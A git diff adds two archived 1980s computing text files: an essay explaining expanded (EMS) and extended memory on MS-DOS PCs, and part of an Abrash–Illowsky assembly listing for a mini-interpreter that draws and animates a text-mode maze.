a/textfiles.com/computers/aboutems.txt b/textfiles.com/computers/aboutems.txt new file mode 100644 index 00000000..f28dd96a --- /dev/null +++ b/textfiles.com/computers/aboutems.txt @@ -0,0 +1,484 @@ +This document was exported from WP 5.0 and some of the formatting codes +were lost (especially footnotery). Please pardon the occasional anomalies +especially out-of-place "1"s which were originally superscripted (footnote). + + + + + + MEMORY EXPANSION IN 80x86-BASED COMPUTERS UNDER MS-DOS + + prepared by + John Wilson, Hyperdyne, Inc. + Annandale, VA + +IN THE BEGINNING ... + + In the beginning, the was the 8080 microprocessor. The 8080 +was, defendably, the "first" microprocessor.1 When the 8080 was +invented, memory for computers was very expensive. The 8080 could +directly address 64 thousand bytes of information, which was a very +great deal in those days. Few systems (or more correctly, few +system owners) could afford to actually place a full 64 K of memory +in their systems. But things changed quickly. The Silicon Valley +guys learned to make transistors smaller and better and it became +much more economically feasible to talk about fully populated 64K +machines. On the software front, things like spreadsheets and word +processors were being invented. These programs were hungry for +memory and the microcomputer user rapidly outgrew the 64K box. + + Before going on with the story, a little digression into the +origins of the 64K limit. This limit was the direct result of the +fact that the CPU chip had only 16 address lines. The address +lines are a set of wires coming out of the CPU which allow the CPU +to indicate what item of memory it wants to read or write. In most +computers, the size of the "pieces" are bytes, or 8-bit characters. +These 16 wires are called the Address Bus. The voltages on the 16 +address lines are interpreted as a binary number (with the first +pin representing the 1's place, the second pin representing the 2's +place, the third pin representing the 4's place, etc.) the +resultant number is the Address being addressed by the CPU. The +number of distinct patterns of 16 things, each of which can have +two values, is 2 raised to the 16th power, or 65536. This number +is 64 times the quantity "1K" which is 1024. (Early on, +programmers engineers decided to use the "K" as a unit of counting +things like memory because it was a nice power of two and figured +it was close enough to a "real" thousand that nobody would notice). +The point of this story is that the original microprocessors could +only address 64K because of the simple reason that they only had +16 address lines. Why didn't they just build one with more address +lines? Well its not that simple. Those address lines had to have +circuitry driving them, and other circuitry to actually generate +the 16-bit addresses, and other circuitry to decode the new +instructions that would use more than 16 bits, and so on, and so +on. And this circuitry was made of transistors. And, +unfortunately, the state of the art of chip manufacturing did not +allow chips to be built with many more transistors. So, mankind +waited for the silicon boys to learn how to fit more transistors +on one raisin-sized chip. + + Meanwhile, back the ranch, The Intel Corporation, in a stroke +of electromarketing genius took the basic 8080 architecture and +doubled up a small portion of the internal workings of the CPU's +address circuitry. They basically duplicated the address register +(the transistors that hold the pattern of bits to place on the +address bus), slid it left 4 bits, and added some simple circuitry +to add it arithmetically to the "old" address register. An so was +born the infamous Intel Segment Register. By making this simple +kluge to the 8080, Intel created the 8086 and 8088 microprocessors +which now effectively had TWENTY address lines and could therefore +address 2 to the 20th locations, a little over one million bytes. +This new unit was called a Megabyte even those it was further away +from a million than a "K" was from a thousand, but then again you +bought the "K", didn't you? The 20 bit address bus allowed the new +amazing spreadsheets to really do some amazing things. This, in +turn allowed Intel to beat competitor Motorola to the marketplace +(who were expanding the address bus the "right" way in their 68000 +family). This in turn led IBM to select the Intel family over +Motorola's as the basis of their new PC, and the rest is history. + + Using the power of the 8088, the Microsoft corporation adapted +the CP/M operating system to the new chip, and, using its new +power, created MS-DOS. Because of a lot of reasons, the 8088 and +MS-DOS took over the world. And everyone was happy. Except ..... +the programmers kept getting more bold in the ways they found to +use memory, and the users wanted still BIGGER spreadsheets, and +started playing with things like CAD/CAM, DBMSs, Artificial +intelligence, desktop publishing, etc, all of which had insatiable +appetites for memory. The silicon boys kept up with the hunger by +developing bigger and better CPUs, the 80286, 80386, 80486 etc.). +These 80286 had a 24-bit address bus and could therefore address +16 MB of memory directly. No one could possibly want to put that +much actual memory in a PC, right? In a pre-emptive first strike, +they also created 80386 which had a 32-bit address bus and could +therefore address 2 to the 32 bytes or over 4 billion +bytes! (Pow! Bam! Take THAT, Power User). The day had finally +come when the CPUs sitting on desktops could finally address more +memory than anyone could afford to buy. +----------- +1 Yes, there was an 8008, and a 4004 before that, but their only, +surviving significance today is that they were the predecessors of +the 8080. +---------- + + End of problem, right? Wrong. Unfortunately, there were +millions and millions of the 20-bit machines out there now (in the +mid-1980's). Probably more significantly there were hundreds of +millions of dollars invested in MS-DOS software that did not know +how to use the new 32-bit instructions and capabilities. +Especially MS-DOS. (Unix and OS/2 and a number of other less well- +known operating environments do use the 32-bit mode, but MS-DOS was +still king). Because Intel wanted to sell more than 3 of these new +chips, they wisely decided to build "modes" into the new chips to +make them compatible with MS-DOS. A Mode is essentially a switch, +inside the CPU that turns it into another chip, insofar a all +logical functionality is concerned. So when you're running MS-DOS +on your shiny new 386 or 486, you're still running with only 20 +bits of address and consequently a 1 MB address space. This mode +is called real mode and the lower 1 MB of addressable memory in +real mode is called conventional memory. + + The solution? EMS or Expanded Memory Specification. + + +EXPANDED MEMORY + + Expanded memory is a way to allow more than 1 MB of memory to +be used by MS-DOS applications. How can this be? The CPU can only +address 1 million different addresses; how can I have more than +one MB in my PC? The answer is that the CPU re-uses the same +address to get to more than one byte of data. It does this by +allowing any one address to actually be used to reference several, +distinct, physically different storage locations - but only one at +a time, of course. + + EMS memory usually resides on special "EMS cards", like the +AST "RAMPage". (I say usually because there are some clever ways +of implementing EMS on 80286 and 80386 machines that don't use +"special" EMS cards; this is discussed later in the section +entitled "Software Approaches to EMS"). The EMS card has memory +chips on it just like regular system memory cards. The difference +is that the memory chips on the card are not connected directly to +the CPUs address bus. These chips are actually wired to another +address bus, totally contained on the card, that has more than 20 +address bits, usually 24 or so. Where do these extra address bits +come from? Well some of them are just passed-through systems +address bits. The rest come from special storage locations onboard +the EMS card, called page registers. How are these page registers +loaded? These registers are themselves directly addressable by the +CPU. To access a byte of data in EMS memory, the CPU first loads +the page register (itself simply another location accessible by the +CPU) and then makes a normal memory reference. Some of the bits +come from the address bus, and the rest come from the bits +previously squirreled away in the page registers. Thus, it can be +seen that a given address on the regular CPUs address bus forms +only part of the address needed to select a particular byte of +memory on the EMS card. To uniquely identify a byte, you need to +specify the regular address plus the contents of the page register. +It follows that one CPU address can correspond to several EMS +memory locations, each of which differs only by the contents of the +page register. The CPU can thus access more than 1 MB of memory +on the EMS card by using its normal address bus augmented by the +page registers. + +HOW IT ALL FITS TOGETHER + + In the early versions of EMS, all EMS memory was mapped to +appear to be in a special address range in the range of all +possible addresses accessible by the CPU. This was usually at +addresses between D0000 and DFFFF (in hexadecimal notation). This +includes exactly 64KB possible addresses. This area of address +space is called the Page Frame, an analogy to a frame around a +picture. The page frame is logically divided into 4 16KB "pages".1 +When we say that the EMS memory is "mapped" into this range, what +we mean is that the EMS card does not respond to any addresses +outside this range. When an address is placed on the address bus +---------- +1 For the sake of simplicity in the following discussion, the +multi-page nature of the page frame will not be mentioned further. +The explanations apply to each page within the page frame +individually. It should also be noted that, strictly speaking, the +4-page, 64 KB page frame applies only to EMS versions 3.2 and +earlier. In EMS 4.0+, the page frame is not limited to just 4 +pages and can, in fact, be all or partially located within the 640 +KB address range normally occupied by conventional RAM. This +feature is used by various multitasking overlays to DOS, such as +Desqview, which actually allow program code to be paged in and out. +---------- + outside this range, the EMS board remains totally passive, just +like it was not plugged in at all. When the CPU asserts an address +within this range, the EMS board comes to life and responds like +regular memory. When the CPU references the EMS address space, the +CPUs address bits are used along with the page register bits to +actually specify which EMS byte to access. The net effect is to +make the EMS card memory appear as a series of "banks" which can +be made (one at a time) to masquerade as "real" system memory at +a certain address in the range D0000-DFFFF hex. These banks are +called EMS pages. Within each page, the practically any byte +addressed is selected by the system address bus bits that were +passed through by the EMS circuitry. The particular page selected +is determined by what value was previously written into the EMS +page registers. All the physical EMS memory locations that respond +to a common value in the page registers are said to be in the same +page. That is, once that special value is loaded into the page +register, any of those locations can be accessed by the CPU using +normal memory read/write instructions. If another value is loaded +into the page registers, a totally different set of EMS memory +bytes (i.e, physically different transistors) are made to respond +to the same CPU addresses as before. + + The model that this behavior suggests is that the EMS memory, +divided up into 16K pages, exists out in limbo somewhere, and is +unable to be addressed by the CPU in any way. The CPU can however +invoke the right magic to instantaneously plug any one of these +disembodied pages right into its addressable memory space. The +magic consists of loading the Holy Page Register. The CPU can, +with equal ease, banish that same page back into limbo, by putting +a different value in the page registers. The thing that makes this +magic useful is that, any data stored in an EMS page is faultlessly +remembered even after it has been banished to zombie land. And, +furthermore, that data can be read by the CPU just by remapping it +into the address space. + + This means that an MS-DOS program can juggle megabytes of +memory resident data using just 20 address bits in good old 8088 +real mode. Of course at any one given instant, most of that data +is in zombie land, but no matter, it can be called back from the +netherworld with a simple, hardware-assisted incantation in +microseconds. + +EMS MEMORY MANAGERS OR DRIVERS + + Each manufacturer of an EMS board is free to actually design +the actual circuitry of his EMS board to suit his whim, his +engineers, and his marketing plan. Most boards are different in +a real, physical way from one another. The magic incantations +necessary to shuffle EMS pages between here and Hoboken is +different for each one. Does each application program need to know +which particular brand/model of board is plugged in and what its +religion is? Fortunately not. Enter the Enhanced Memory +Specification. EMS is a specification of a standardized way that +applications interact with EMS hardware. This interaction is via +the software interrupt feature of the 8088/MS-DOS. All +applications that wish to use EMS memory call interrupt 67H the +same way with the same arguments, no matter who made the board. +When the interrupt is issued, control passes to the memory resident +EMS management software, usually called either an EMS memory +manager or EMS driver (same thing). This piece of software is +unique to each brand of board and is normally supplied by the +boards vendor. It is the express purpose of this piece of software +to turn the standard EMS invocation arguments into the particular +set of hardware incantations understood by the board. Beware +mixing boards and drivers from different sources! This may work +in rare circumstances but will eventually lead to consumption of +excessive amounts of alcoholic beverages. + +EXTENDED MEMORY + + OK. Now we know how EMS works: it expands a selected 64KB- +sized range of addresses in the CPUs address space to several +megabytes by paging-in one chunk at a time. But what about +"Extended Memory"?. Actually extended memory is a much simpler +concept. Remember those unused address lines in the 80286 and +80386? (MS-DOS and other real-mode applications only use the first +20 of the 80286's 24 and the 80386's 32). They were not put there +for decoration. The CPU can be put in Protected Mode and can then +use those extra address lines to address megabytes and megabytes +of memory without needing the help of the special EMS hardware like +page registers and private (EMS-card) address busses. In protected +mode, the CPU can address all physical memory in the same, natural +way. In fact, the one megabyte boundary loses all significance, +except for the painful memory of what it used to be like back in +that awful 20-bit real mode. Extended memory is thus just like +conventional memory, just extended up to higher addresses. The +down side is, of course, that MS-DOS does not know how to switch +into protected mode, and wouldn't know what to do there if it did. +Rectifying this shortcoming, and all its implications, is the sole +reason for OS/2. + +SOFTWARE APPROACHES TO EMS IMPLEMENTATION + + The discussion of EMS so far has talked exclusively about +hardware approaches to EMS. In the 8088, hardware must be employed +to supplement the deficiencies of that chip. In the 80286 and +80386, however, there are software-only methods to give the same +functionality as EMS hardware. Both approaches use extended memory +for the storage of EMS page data. + + In the 80286, EMS memory contents are brought into the 1 MB, +conventionally-addressable range by physically copying 16 KB blocks +of memory to and from extended memory. The EMS "page" that the +application program sees is actually a block of conventional memory +that has been filled with the contents of a block of extended +memory. The copying is done by a piece of software known as an +EMS Emulator (driver) which is usually loaded like other DOS device +drivers in CONFIG.SYS. Note that to access the extended memory, +the EMS Driver must switch into protected mode, copy the data, then +hightail it back into real-mode to keep DOS happy. The extended +memory blocks, in this scheme, are emulating a block of memory that +would normally be physically resident on the EMS card. Note that +these are not really "paged"-in in the same sense as true EMS +pages, nor is there any "mapping" going on. All physical memory +contents retain their actual addresses as far as the CPU is +concerned, only there contents are copied back and forth. + + The advantage of this scheme is that EMS functionality can be +achieved in machines without actual EMS hardware. A disadvantage +of this scheme is its performance. Whole 16K blocks must be moved +to access a new page (which takes milliseconds), in contrast to +"true" EMS where just a page register must be loaded (which takes +microseconds). Another disadvantage is the fact that some precious +conventional memory is consumed by the emulated page frame. + + In the 80386, the solution is much more elegant. In true EMS, +the contents of the page registers can be thought of as a memory- +mapping table. That is, the contents of the page register, in +essence, point to a particular block of EMS-card-resident memory - + change the page register contents and a new physical page shows +up in the page frame. The 386 was designed for operating systems +much more sophisticated than MS-DOS; these operating systems take +for granted the presence of memory mapping capability. The 80386 +has, in fact, an internal memory mapping facility much more +sophisticated than the crude, bank-oriented page registers of an +EMS card. The 386's memory management unit allows any arbitrary- +sized chunk of physical memory to be mapped to anywhere in the +address space, including the lower 1 MB. And, most importantly, +to the address were an EMS-aware application expects to find the +page frame and the EMS pages contained therein. With the 80386, +hardware within the CPU performs the mapping previously done by EMS +hardware. Programming of the CPUs mapping registers is performed +by a device driver usually known as an Expanded Memory Manager. +Memory managers are written to run on the (standard) 80386 and not +some particular vendor's EMS hardware. This allows third-party +vendors to produce EMS emulators for any 80386. Examples are +"QEMM-386" by Quarterdeck Systems and "386-to-the-Max" by Qualitas. + + Finally, there is one more software approach to EMS that can +be used with any machine. That approach is called Virtual EMS and +employs a system's hard disk as storage for EMS pages. A device +driver intercepts EMS calls in much the same way as the approach +described above for the 80286, except that copying is done between +a page frame in conventional memory, and sectors of your hard disk. +This is a clever approach, and allows EMS memory to be much greater +than the amount of memory in your machine, but, because disk is +thousands of times slower than semiconductor memory, this approach +should only be used by the terminally desperate. + + APPENDIX - SUMMARY FOR USERS + + EMS is the specification of a software technique for making +more than 640 KB (the normal DOS limit) available to your programs. +Put simply, EMS reserves a block of memory space in your PC and +allows a block of RAM (usually resident on an EMS card) to be +switched into that address range. There are generally many +identical blocks of RAM present on the EMS card, each and any one +of which can be "plugged" in -- only one at a time. Your CPU can +use one of these blocks to store data in, and then switch in +another block, store data in that, switch in yet another block, and +so on, and so on. Later, the CPU can recall these blocks in the +same or different order and read back the original data. In many +ways, this performs the same function as your system's disk -- +except that it's all done in solid-state memory and is thousands +of times faster. + + There are four approaches to actually implementing EMS, +depending to some extent, on what type of machine you have. These +approaches are: + + - an EMS memory card (like the AST "Rampage") [any DOS + computer, but usually 8088s or 80286s] + + - an EMS emulator [80286 or 80386, but usually only + on 80286's] + + - an Extended Memory Manager [386 only] (for example + Quarterdeck System's "QEMM-386 or Qualitas's "386- + to-the-Max" ) + + - a Virtual Memory Manager [any DOS machine] + + An EMS memory card is more than just a memory expansion card: +it contains special circuitry to perform the bank-switching +operation discussed above. To use an EMS card, you will have to +perform two steps: +(1) Configure the EMS card hardware to match your computer's +configuration and (2) install a special EMS card driver for the +board in your CONFIG.SYS file. Details and procedures differ for +different makes and models of EMS cards. Consult your EMS card's +users manual for instructions. Note that drivers are usually card- +specific; you cannot, in general, use Vendor A's driver with Vendor +B's card. + + Not all "memory" expansion cards are EMS cards. There is +another type of memory called extended memory which is used by +other operating systems such as OS/2 and Unix. It is also used by +a few DOS utilities, most notably IBM's VDISK RAM disk emulator. +If your computer is advertised as having more than 640 KB of memory +installed, it's a good bet that it's extended memory and not EMS +memory. Few applications can use extended memory, although by using a +software technique which will be discussed in a moment, extended +memory can be made to serve as EMS memory. Before deciding on an +EMS strategy, determine the type of memory your computer already +has installed. Be forewarned: IBM, as usual, has a different name +for extended memory (like everything else). They call it (you +guessed it) expanded memory. So, if you bought it from IBM, and +it's called expanded memory, it's extended memory. Everyone else +pretty much sticks to standard nomenclature but to be sure, look +for the phrase "EMS x.x compliant" in the documentation, where x.x +is usually a number like 3.2 or 4.0. +---------- +1 The 'S' in EMS stands for "Specification". EMS is not a +particular way to build EMS memory, rather, it is the specification +of a software interface to it. Different vendors can, and do, +implement EMS differently. What is the same, however, is the way +that applications programs interface to this memory. +---------- + Many EMS cards allow the memory contained on them to be +configured as all EMS memory, all extended memory, or a mixture. +If you use VDISK or any other special programs that use extended +memory, you may wish to reserve part of the board's memory for use +as extended memory. Otherwise, there's really no good reason for +not configuring all of your memory as EMS. (Note that EMS boards +are generally more expensive than "plain" extended memory boards +because of the additional circuitry required). Consult your +board's users manual for the proper switch settings or software +settings to give the mix you desire. EMS cards can be used in any +machine, but are usually found in 8088s and 80286s because there +is a better and cheaper way to go in 80386s as will be discussed +below. + +EMS EMULATORS + + A less common approach to implementing EMS in your computer +is a EMS Emulator. This is a software-only approach that requires +no special hardware to use. It essentially turns extended memory +into expanded memory. Unfortunately, there is a price for this +magic - performance. Because extended memory lacks the special +hardware to switch its address like the blocks of memory on an EMS +card, this software must copy whole blocks of data (16 KB's worth) +back and forth between your program and extended memory every time +a new block is required -- even if it's just to read a single byte. +Depending on the nature of the program, this can be a few times +slower or hundreds of times slower than "true" EMS. +This is not a recommended solution for +that reason, however, if necessary, it can be used. This approach +can only be used on 80286 and 80386 machines which have extended +memory. Machines based on the 8088 (like the original PC and XT) +cannot accommodate extended memory. On the 80386, a much better +solution is described below. + +EXTENDED MEMORY MANAGERS + + Built into every 80386 is a special capability that can be +used to do an excellent job of providing EMS memory without the use +of EMS hardware. This facility is called the paging unit or Memory +Management Unit (MMU). The MMU consists of circuitry very much +like the switching circuitry onboard EMS cards, except much more +sophisticated. It was actually included for use by advanced +operating systems but can be used quite nicely to emulate EMS in +80386-based DOS machines. The MMU, like the EMS emulators, can +turn extended memory into expanded memory through software-only +means. Unlike those emulators, the MMU, in conjunction with a +piece of software known as an Extended Memory Manager (EMM), does +not suffer any performance penalty. In fact, it is usually faster +than true EMS cards because: the circuitry is onboard the CPU chip; +the 80386 is faster than lower-class machines that usually use EMS +cards; and the extended memory used is often fast, 32-bit system +memory rather than card-based memory which is slowed down by the +relatively slow I/O bus. On 80386 systems, this is definitely the +way to go. Excellent EMMs include "386-to-the-Max" by Qualitas, +Inc., and "QEMM-386" by Quarterdeck systems, Inc.. To use these +EMMs, you need to install them in your CONFIG.SYS file. Like the +EMS cards, you will have to configure them to partition your +available system memory between extended and expanded memory. +Consult the users manual for the package you are using. + +VIRTUAL MEMORY MANAGERS + + Virtual Memory Managers are another software-only approach to +EMS. These function almost identically to the EMS emulators +discussed above, except that they use the system disk rather than +extended memory as the storage medium for blocks of memory copied +out of your program. As you can imagine, this is excruciatingly +s-l-o-w. Use this approach only as a last resort. + diff --git a/textfiles.com/computers/abrash.lst b/textfiles.com/computers/abrash.lst new file mode 100644 index 00000000..82a20b0b --- /dev/null +++ b/textfiles.com/computers/abrash.lst @@ -0,0 +1,472 @@ +_ROLL YOUR OWN MINILANGUAGES WITH MINI-INTERPRETERS_ +by Michael Abrash and Dan Illowsky + + + +[LISTING ONE] + +; This program demonstrates the use of a mini-interpreter to produce +; code that is compact, flexible and easy to modify. The mini- +; program draws and labels a maze and animates an arrow through +; the maze. +; +; Note: This program must be run in 80-column text mode. +; +; Tested with TASM 1.0 and MASM 5.0. +; +; By Dan Illowsky & Michael Abrash 2/18/89 +; Public Domain +; +Stak segment para stack 'stack' ;allocate stack space + db 200h dup (?) +Stak ends +; +_TEXT segment para public 'code' + assume cs:_TEXT, ds:_TEXT +; +; Overall animation delay. Selected for an AT: set higher to slow +; animation more for faster computers, lower to slow animation less +; for slower computers. +; +DELAY_COUNT equ 30000 +; +; Equates for mini-language commands, used in the data +; sequences that define mini-programs. The values of these +; equates are used by Interp as indexes into the jump table +; Function_Table in order to call the corresponding subroutines. +; +; Lines starting with ">>" describe the parameters that must +; follow the various commands. +; +Done equ 0 ;Ends program or subprogram. + ;>>No parms. +SubProg equ 1 ;Executes a subprogram. + ;>>Parm is offset of subprogram. +SetXY equ 2 ;Sets the cursor location (the location at + ; which to output the next character). + ;>>Parms are X then Y coordinates (both + ; bytes). +SetXYInc equ 3 ;Sets the distance to move after displaying + ; each character. + ;>>Parms are X then Y amount to move after + ; displaying character (both bytes). +SetX equ 4 ;Sets the X part of the cursor location. + ;>>Parm is the X coordinate (byte). +SetY equ 5 ;Sets the Y part of the cursor location. + ;>>Parm is the Y coordinate (byte). +SetXInc equ 6 ;Sets the X part of the amount to move after + ; displaying each character. + ;>>Parm is the X amount to move after + ; character is displayed (byte). +SetYInc equ 7 ;Sets the Y part of the amount to move after + ; displaying each character. + ;>>Parm is the Y amount to move after + ; character is displayed (byte). +SetAtt equ 8 ;Sets the screen attribute of characters to + ; be displayed. + ;>>Parm is attribute (byte). +TextUp equ 9 ;Displays a string on the screen. + ;>>Parm is an ASCII string of bytes, + ; which must be terminated by an EndO byte. +RepChar equ 10 ;Displays a single character on the screen + ; a number of times. + ;>>Parms are char to be displayed followed + ; by byte count of times to output byte. +Cls equ 11 ;Clears screen and makes text cursor + ; invisible. + ;>>No parms. +SetMStart equ 12 ;Sets location of maze start. + ;>>Parms are X then Y coords (both bytes). +Mup equ 13 ;Draws maze wall upwards. + ;>>Parm is byte length to draw in characters. +Mrt equ 14 ;Draws maze wall right. + ;>>Parm is byte length to draw in characters. +Mdn equ 15 ;Draws maze wall downwards. + ;>>Parm is byte length to draw in characters. +Mlt equ 16 ;Draws maze wall left. + ;>>Parm is byte length to draw in characters. +SetAStart equ 17 ;Sets arrow starting location. + ;>>Parms are X then Y coordinates + ; (both bytes). +Aup equ 18 ;Animates arrow going up. + ;>>No parms. +Art equ 19 ;Animates arrow going right. + ;>>No parms. +Adn equ 20 ;Animates arrow going down. + ;>>No parms. +Alt equ 21 ;Animates arrow going left. + ;>>No parms. +DoRep equ 22 ;Repeats the command that follows + ; a specified number of times. + ;>>Parm is repetition count (one byte). +; +EndO equ 0 ;used to indicate the end of a + ; string of text in a TextUp + ; command. +;******************************************************************** +; The sequences of bytes and words between this line and the next +; line of stars are the entire mini-program that our interpreter will +; execute. This mini-program will initialize the screen, put text on +; the screen, draw a maze, and animate an arrow through the maze. +; +DemoScreen$ label byte ;this is the main mini-program that our + ; interpreter will execute +; Initialize the screen + db SubProg + dw InitScreen$ +; Put up words + db SetXY,0,0, SetXYInc,0,1, TextUp,'START',EndO + db SetXY,79,20, TextUp,'END',EndO +; Draw the maze + db SetMstart,4,0, Mrt,8, Mdn,4, Mrt,4, Mup,3, Mrt,4, Mdn,3 + db Mrt,4, Mdn,8, Mrt,3, Mup,3, Mrt,5, Mup,9, Mrt,17, Mdn,9 + db Mrt,5, Mdn,3, Mrt,4, Mup,10, Mrt,12, Mdn,18, Mrt,6 + db SetXY,4,2, Mrt,4, Mdn,2, Mlt,4, Mdn,18, Mrt,12, Mup,4 + db Mrt,4, Mdn,4, Mrt,11, Mup,11, Mrt,5, Mup,9, Mrt,9, Mdn,9 + db Mrt,5, Mdn,11, Mrt,12, Mup,4, Mrt,4, Mdn,4, Mrt,10 + db SetXY,8,6, SubProg + dw Box4x6$ + db SetXY,8,14, SubProg + dw Box4x6$ + db SetXY,24,14, SubProg + dw Box4x6$ + db SetXY,54,14, SubProg + dw Box4x6$ + db SetXY,62,4, SubProg + dw Box4x6$ + db SetXY,16,6, SubProg + dw Box4x4$ + db SetXY,16,12, SubProg + dw Box4x4$ + db SetXY,62,12, SubProg + dw Box4x4$ +; Animate the arrow through the maze. + db SetAStart,3,0, Alt,2, Adn,2, Art,2, Aup,2 + db SetXY,0,0 + db DoRep,5,SubProg + dw SpinAround$ + db Alt,2, Adn,1, Art,9, Adn,4, Alt,4, Adn,8, Art,8, Adn,8 + db Alt,8, Aup,8, Art,8, Aup,2, Art,8, Adn,2, Art,7, Aup,3 + db Art,5, Aup,9, Art,13, Adn,9, Art,5, Adn,11, Art,8, Aup,10 + db Art,8, Aup,8, Alt,8, Adn,8, Art,8, Adn,10, Art,8, Adn,1 + db Art,2, Aup,2, DoRep,5,SubProg + dw SpinAround$ + db Alt,2, Adn,1, Art,1 + db Done +; Subprogram to clear the screen and initialize drawing variables. +InitScreen$ db SetXY,0,0, SetAtt,7, SetXYInc,1,0, Cls, Done +; Subprograms to draw boxes. +Box4x4$ db Mrt,4, Mdn,4, Mlt,4, Mup,4, Mrt,2, Done +Box4x6$ db Mrt,4, Mdn,6, Mlt,4, Mup,6, Mrt,2, Done +; Subprogram to spin the arrow around a square. +SpinAround$ db Alt,2, Adn,2, Art,2, Aup,2, Done +;******************************************************************** +; Data for outputting text characters to the screen. +Text_Out_Data label byte +Cursor_X_Coordinate db 0 +Cursor_Y_Coordinate db 0 +Cursor_X_Increment db 1 +Cursor_Y_increment db 0 +Character_Attribute db 7 +Last_Maze_Direction db 0ffh ;0-up, 1-rt, 2-dn, 3-lt + ; 0ffh-starting +AnimateLastCoordinates dw 0 ;low byte is X, high byte is Y +; +; Jump table used by Interp to call the subroutines associated +; with the various function numbers equated above. The functions +; called through this jump table constitute the mini-language +; used in this program. +; +Function_Table label word ;list of function addresses + dw Done% ; which correspond one for + dw SubProg% ; one with the commands defined + dw SetXY% ; with EQU above + dw SetXYInc% + dw Set% ;Set%, MOut%, and Animate% all use + dw Set% ; the function number to determine + dw Set% ; which byte to set or which + dw Set% ; direction is called for + dw Set% + dw TextUp% + dw RepChar% + dw Cls% + dw SetMStart% + dw MOut% + dw MOut% + dw MOut% + dw MOut% + dw SetAStart% + dw Animate% + dw Animate% + dw Animate% + dw Animate% + dw DoRep% +; +; Program start point. +; +Start proc far + push cs ;code and data segments are the + pop ds ; same for this program + mov si,offset DemoScreen$ ;point to mini-program + call Interp ;execute it + mov ah,1 ;wait for a key before clearing the + int 21h ; the screen and ending + mov ah,15 ;get the current screen mode + int 10h ; so it can be set to force + sub ah,ah ; the screen to clear and the + int 10h ; cursor to reset + mov ah,4ch + int 21h ;end the program +Start endp +; +; Mini-interpreter main loop and dispatcher. Gets the next +; command and calls the associated function. +; +Interp proc near + cld +GetNextCommand: + lodsb ;get the next command + mov bl,al + xor bh,bh ;convert to a word in BX + shl bx,1 ;*2 for word lookup + call [bx+Function_Table] ;call the corresponding + ; function + jmp short GetNextCommand ;do the next command +; +; The remainder of the listing consists of functions that +; implement the commands supported by the mini-interpreter. +; +; Ends execution of mini-program and returns to code that +; called Interp. +; +Done%: + pop ax ;don't return to Interp + ret ;done interpreting mini-program or subprogram + ; so return to code that called Interp +; +; Executes a subprogram. +; +SubProg%: + lodsw ;get the address of the subprogram + push si ;save pointer to where to + ; resume the present program + mov si,ax ;address of subprogram + call Interp ;call interpreter recursively + ; to execute the subprogram + pop si ;restore pointer and resume + ret ; the program +; +; Sets the screen coordinates at which text will be drawn. +; +SetXY%: + lodsw + mov word ptr [Cursor_X_Coordinate],ax + ret +; +; Sets the amount by which the cursor will move after each +; character is output to the screen. +; +SetXYInc%: + lodsw + mov word ptr [Cursor_X_Increment],ax + ret +; +; Sets individual X coordinate, Y coordinate, X movement after +; character is output to the screen, Y movement, or character +; attribute depending on function number. +; +Set%: + shr bx,1 ;calculate the command number + lodsb ; get the new value + mov [bx+Text_Out_Data-SetX],al ;store in location + ; corresponding to + ; the command number +Return: + ret +; +; Displays a string of text on the screen. +; +TextUp%: +GetNextCharacter: + lodsb ;get next text character + or al,al ;see if end of string + je Return ;if so, next command + call OutputCharacter ;else output character + jmp short GetNextCharacter ;next character +; +; Displays a single character on the screen multiple times. +; +RepChar%: + lodsw ;get the character in AL + ; and the count in AH +RepCharLoop: + push ax ;save the character and count + call OutputCharacter ;output it once + pop ax ;restore count and character + dec ah ;decrement count + jne RepCharLoop ;jump if count not now 0 + ret +; +; Clears the screen and turns off the cursor. +; +Cls%: + mov ax,600h ;BIOS clear screen parameters + mov bh,[Character_Attribute] + xor cx,cx + mov dx,184fh + int 10h ;clear the screen + mov ah,01 ;turn off cursor + mov cx,2000h ; by setting bit 5 of the + int 10h ; cursor start parameter + ret +; +; Sets the start coordinates for maze-drawing. +; +SetMStart%: + lodsw ;get both X and Y coordinates and store + mov word ptr [Cursor_X_coordinate],ax + mov [Last_Maze_Direction],0ffh ;indicate no + ret ; last direction + +; +; Maze-drawing tables. +; +XYincTable db 0,-1, 1,0, 0,1, -1,0 + ;X & Y increment pairs for the 4 directions +CharacterGivenDirectionTable db 179,196,179,196 + ;vertical or horizontal line character to use + ; for a given direction +FirstCharGivenNewAndOldDirectionTable label byte + db 179,218,179,191, 217,196,191,196 ;table of corner + db 179,192,179,217, 192,196,218,196 ; characters +; +; Outputs a maze line to the screen. +; +MOut%: + sub bx,Mup+Mup ;find new direction word index + mov ax,word ptr [bx+XYincTable] ;set for new + mov word ptr [Cursor_X_Increment],ax ; direction + shr bx,1 ;change to byte index from word index + mov al,[bx+CharacterGivenDirectionTable] ;get char for + ; this direction + mov ah,al ;move horizontal or vert + mov dl,[Last_Maze_Direction] ; character into AH + mov [Last_Maze_Direction],bl ;if last dir is 0ffh then + or dl,dl ; just use horiz or vert char + js OutputFirstCharacter ;look up corner character + shl dl,1 ; in table using last + shl dl,1 ; direction*4 + new direction + add bl,dl ; as index + mov al,[bx+FirstCharGivenNewAndOldDirectionTable] +OutputFirstCharacter: + push ax ;AL has corner, AH side char + call OutputCharacter ;put out corner character + pop ax ;restore side char to AH + lodsb ;get count of chars for this + dec al ; side, minus 1 for corner + xchg al,ah ; already output + jmp short RepCharLoop ;put out side char n times +; +; Table of arrow characters pointing in four directions. +; +AnimateCharacterTable db 24,26,25,27 +; +; Animates an arrow moving in one of four directions. +; +Animate%: + sub bx,(Aup+Aup) ;get word dir index + mov ax,word ptr [XYIncTable+bx] ;set move direction + mov word ptr [Cursor_X_Increment],ax + lodsb ;get move count + shr bx,1 ;make into byte + mov ah,[bx+AnimateCharacterTable] ; index and get + xchg al,ah ; char to animate +NextPosition: ; into AL, AH count + mov dx,[AnimateLastCoordinates] ;coords of last arrow + ;move cursor to where last + ; character was output + mov word ptr [Cursor_X_Coordinate],dx + push ax ;save char and count + mov al,20h ;output a space there + call OutputCharacter ; to erase it + pop ax ;restore char in AL, count in AH + push ax ;save char and count + mov dx,word ptr [Cursor_X_Coordinate] ;store new coords + mov [AnimateLastCoordinates],dx ; as last + call OutputCharacter ;output in new + mov cx,DELAY_COUNT ; location then +WaitSome: ; wait so doesn't + loop WaitSome ; move too fast + pop ax ;restore count and + ; character + dec ah ;count down + jne NextPosition ; if not done + ret ; do again +; +; Sets the animation start coordinates. +; +SetAStart%: + lodsw ;get both X & Y + mov [AnimateLastCoordinates],ax ; coordinates and + ret ; store +; +; Repeats the command that follows the count parameter count times. +; +DoRep%: + lodsb ;get count parameter +NextRep: + push si ;save pointer to command + ; to repeat + push ax ;save count + lodsb ;get command to 